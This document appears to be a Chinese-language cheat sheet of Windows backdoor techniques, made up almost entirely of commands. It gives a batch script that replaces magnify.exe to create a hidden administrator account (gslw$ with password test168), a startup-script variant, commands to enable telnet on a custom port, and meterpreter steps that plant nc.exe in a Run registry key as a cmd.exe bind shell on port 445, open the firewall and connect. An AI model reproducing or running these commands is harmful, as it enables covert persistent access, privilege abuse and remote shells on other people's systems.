Windows後門小計
嗅探欺騙:
在目標機上安裝嗅探工具竊取管理員的密碼
放大鏡替換:
構造批處理:
@echo off
net user gslw$ test168 /add
net localgroup administrators gslw$ /add
%Windir%\system32\nagnify.exe
exit
轉換exe檔案:
battoexe等工具
檔案替換:
@echo off
copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
copy %Windir%\system32\magnify.exe nagnify.exe
replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
replace.exe %Windir%\magnify.exe %Windir%\system32
exit
後門利用:
Win+U啟動輔助工具項,開啟放大鏡即可
組策略欺騙:
在windows開關機啟動指令碼中做手腳:
@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit
telnet利用:
遠端改埠:“tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168 ”
在目標機開啟:
tlntadmn config port=2233 //修改 telnet預設埠
sc config tlntsvr start= auto //設定啟動型別為自啟動
net start telnet //開啟telnet服務項
tlntadmn config sec =passwd //設定密碼
tlntadmn config port = 800 //設定埠
遠端登陸:telnet 192.168.1.9 800 //鍵入賬號密碼即可連線
msf(Netcat.exe):
上傳到目標系統:meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
檢視自啟:meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
設定自啟:meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
檢查確認:meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
開啟cmd :meterpreter > execute -f cmd -i
開放445埠:netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
檢查是配置:netsh firewall show portopening
後門使用:nc -v 172.16.104.128 445